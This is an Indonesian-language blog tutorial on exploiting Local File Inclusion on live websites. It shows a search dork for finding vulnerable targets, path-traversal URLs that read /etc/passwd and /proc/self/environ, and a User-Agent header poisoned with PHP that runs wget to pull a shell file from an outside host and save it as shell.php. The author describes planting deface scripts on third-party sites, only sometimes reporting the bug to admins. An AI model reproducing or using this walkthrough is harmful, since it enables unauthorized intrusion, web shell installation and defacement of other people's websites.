Skip to content Skip to sidebar Skip to footer

Widget HTML #1

Memanfaatkan Bug LFI di Website

Hallo :)
Pada kesempatan kali ini saya akan coba mengimplementasikan bagaimana caranya mengexploitasi pada web target yang rentan terhadap serangan LFI atau bisa disebut juga dengan Local File Inclusion.

Oke tak usah berlalu-lama, kita langsung saja ya...

Hal yang pertama adalah mencari target yang vulnerable terhadap serangan LFI. Kalian bisa memanfatkan search engine seperti google, bing, atau yang lainya dengan dork, contoh dorknya "index.php?file= site:com" selebihnya kembangin sendiri biar mendapatkan yang benar-benar vuln.

Tapi disini saya sudah punya target yang siap untuk dieksekusi, tapi saya tidak akan saya sebutkan nama websitenya,  contoh target saya seperti ini...
https://contoh.com/?file=college.php

Target sudah ada, kemudian coba ganti "college.php" dengan "../../../" contoh lengkapnya akan seperti ini..
https://contoh.com/?file=../../../
Setelah saya klik enter, tapi disini saya tidak mendapatkan pesan error alias hanya blank warna putih gitu. Entah ini vuln atau tidak saya juga agak begitu kurang paham.

Ok gamasalah, coba iseng-iseng menganti "../../../" dengan seperti ini "/etc/passwd" contoh seperti ini...
https://contoh.com/?file=/etc/passwd
Tapi lagi-lagi disini tidak mendapatkan apa-apa, tampilan hanya menampkan blank warna putih, shit!

Mikir sebentar, kemudian disini saya mencoba menaikan directorynya. Contoh seperti ini..
https://contoh.com/?file=../etc/passwd > blank
https://contoh.com/?file=../../etc/passwd > lagi-lagi hanya blank
Tapi kemudian pada saat saya menaikan directorynya pas ke tiga, sepetti ini...
https://contoh.com/?file=../../../etc/passwd
Boom, saya berhasil membaca file etc/passwd wah mantap ini mah hhh...


Selanjutnya saya akan mencoba mengecheck /proc/self/environ apakah bisa diakses atau tidak? Sekarang ganti "/etc/passwd" dengan "/proc/self/environ" lalu jalankan..
https://contoh.com/?file=../../../proc/self/environ
Mantul mantap betul ternyata berhasil membaca filenya, seperti ini...


Yeah, /proc/self/environ sukses diakses. Tapi jika kalian pada saat mau mengakses /proc/self/environ menampilkan halaman kosong (blank) atau tidak bisa diakses, atau mungkin itu beroperating system *BSD.

Sekarang selanjutnya mari kita injeksi dengan malicious code dengan meracuni  pada bagian http headernya. Kalian bisa mengunakan addon tamper data mozilla firefox.
Caranya buka tamper data di mozilla firefox kemudian lalu masukan url /proc/self/environ yang tadi "https://contoh.com/?file=../../../proc/self/environ" lalu pada bagian user-agent isikian code seperti berikut ini...

<?system (' wget http://shellkalian.com/shell.txt -O shell.php');?>

lalu klik submit.

Ok injeksi malicious code selesai, apabila sukses letak shellnya berada pada directory berikut...

https://contoh.com/shell.php

#Cara upload shell lfi dengan tamper data di android

Ok berikut ini demo videonya, silahkan ditonton.


Kalo shell udah keupload gitu selanjutnya terserah kalian dah hehe. Kalo aku sih biasanya hanya menitipkan file script deface saja tapi kadang-kadang juga lapor ke adminya kalo websitenya ada bug, perihal tidak digubris atau istilahnya tidak ada tangapan apa-apa dari pihak si admin itu tidak masalah slow aja hhh.

Ok sekian utuk tutorial LFI (Local File Inclusion) pada kali ini. Artikel saya ambil dari berbagai sumber kemudian saya tulis ulang sesuai apa yang saya sudah pahami dan pelajari. Semoga menambah pengetahuan buat kalian dan tentunya ambil sisi baiknya saja.

Happy reading and learning!

2 comments for "Memanfaatkan Bug LFI di Website"